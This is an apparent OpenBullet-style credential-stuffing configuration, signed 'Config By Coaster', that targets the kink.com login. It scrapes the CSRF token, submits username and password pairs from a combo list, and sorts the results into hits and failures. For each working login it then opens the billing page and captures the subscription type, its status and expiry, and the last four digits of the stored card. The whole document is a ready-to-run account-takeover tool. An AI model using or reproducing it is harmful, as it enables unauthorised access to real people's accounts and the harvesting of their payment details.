[SETTINGS]
{
  "Name": "Kink.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-10T19:19:17.4217589+01:00",
  "AdditionalInfo": "",
  "Author": "Coaster",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.kink.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"_csrf\" value=\"" "\" />" -> VAR "1" 

REQUEST POST "https://www.kink.com/login" 
  CONTENT "username=<USER>&password=<PASS>&_csrf=<1>&phone=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.kink.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.kink.com/" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 94" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Bad username or password" 
  KEYCHAIN Success OR 
    KEY "userid" 

REQUEST GET "https://www.kink.com/my/billing" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "You do not have a card on file." 
  KEYCHAIN Success OR 
    KEY "<span id=\"5c37e6e380ebe33955aa90da-status\" class=\"subscription-status\" title=\"rebill-active\">" 

PARSE "<SOURCE>" LR "<span class=\"subscription-name\">" "</span>" -> CAP "Sub Type" 

PARSE "<SOURCE>" LR "<span id=\"5c37e6e380ebe33955aa90da-status\" class=\"subscription-status\" title=\"rebill-active\">" "</span>" -> CAP "Sub Status" 

PARSE "<SOURCE>" LR "<span id=\"5c37e6e380ebe33955aa90da-rebill\" class=\"subscription-expiration\">" "</span>" -> CAP "Sub Expiration" 

PARSE "<SOURCE>" LR "<span class=\"cc-last-four\">" "</span>" -> CAP "Last 4 On CC" "" " | Config By Coaster" 

